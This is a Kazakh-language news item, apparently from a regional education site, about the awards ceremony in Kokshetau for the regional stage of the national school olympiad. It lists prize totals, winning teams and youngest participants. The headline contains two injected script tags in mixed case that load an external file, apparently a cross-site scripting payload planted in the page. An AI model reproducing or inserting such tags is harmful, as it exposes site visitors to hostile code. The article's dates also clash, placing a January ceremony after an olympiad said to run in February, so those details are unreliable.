Жалпы білім беретін пәндер бойынша республикалық олимпиаданың ІІІ (облыстық) кезеңінің жеңімпаздары мен жүлдегерлерін салтанатты марапаттау рәсімі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.01.2025

2025 жылғы 9 қаңтар күні Көкшетау қаласында 9-11 сынып оқушылары арасында жалпы білім беретін пәндер бойынша республикалық олимпиаданың ІІІ (облыстық) кезеңінің жеңімпаздары мен жүлдегерлерін салтанатты марапаттау рәсімі өтті.

Олимпиада 2025 жылғы 5-9 ақпан аралығында Көкшетау қаласында өтті, оған Ақмола облысының 415-ден астам оқушысы, ІІ (аудандық (қалалық) кезеңінің жеңімпаздары қатысты.

Олимпиаданың негiзгi мақсаттары мен мiндеттерi: шығармашылық қабілеттерін дамыту, теориялық білімі мен тәжірибелік шеберлігін тереңдету, жеке тұлғаның өзін-өзі дамытуына ықпал ету, дарынды балаларды анықтау үшін жағдай жасау, халықаралық олимпиадаларға қатысатын оқушыларды iрiктеу және даярлау, Қазақстан Республикасында білім берудің беделiн көтеру.

Олимпиада қоғамдық-гуманитарлық және жаратылыстану-математикалық бағыттарда екі турда, классикалық олимпиадалық тапсырмалар түрінде өтті.

2025 жылғы 8 қаңтар күні олимпиада қатысушылары Ш.Құсайынов атындағы қазақ музықалық драма театрында «Алдаспан» спектаклін тамашалады.

Олимпиаданы өткізу қорытындысы бойынша 218 ақмолалық оқушы жеңімпаз, жүлдегер және грамота иегерілері атанды: І орын-41; ІІ орын – 40; ІІІ орын – 105; грамота - 32.

Жүлделі орындардың санына сәйкес үздік командалар анықталды. Олар «Үздік олимпиадалық команда-2025» номинациясы бойынша дипломдармен, кубоктармен марапатталды:

- жаратылыстану-математикалық бағыттағы пәндер бойынша:

«Білім-инновация» лицей-интернатының командасы;

Щучинск қаласы, «Білім-инновация» IT лицей-интернатының командасы;

Степногорск қаласы, № 4 "Болашақ" облыстық мамандандырылған мектеп-лицей-интернатының командасы.

- қоғамдық-гуманитарлық бағыттағы пәндер бойынша:

Көкшетау қаласының командасы;

 Целиноград ауданының командасы;

Көкшетау қаласы, Абай атындағы дарынды балаларға арналған № 3 мамандандырылған мектеп-интернатының командасы.

Жаратылыстану-математикалық бағыттағы пәндер бойынша «Ең жас қатысушы-2025» номинациясы дипломымен және  кубогымен информатика пәнінен 11-сынып үшін қатысқан «Білім-инновация» лицей-интернатының 7-сынып оқушысы Сағынбек Антар марапатталды.

Қоғамдық-гуманитарлық бағыттағы пәндер бойынша «Ең жас қатысушы-2025» номинациясы дипломымен және  кубогымен ағылшын тілі пәнінен 9-сынып үшін қатыскан «Білім-инновация» лицей-интернатының 7-сынып оқушысы Калкаманов Султанахмет марапатталды.

Қатысушыларды жеңістерімен шын жүректен құттықтаймыз! Сіздерге жалпы білім беретін пәндер бойынша республикалық олимпиаданың қорытынды кезеңінде Ақмола облысының намысын сәтті қорғауды тілейміз!!!

Просмотров: 1237


Пікір қосу



Деректерді қолтаңбаға қосу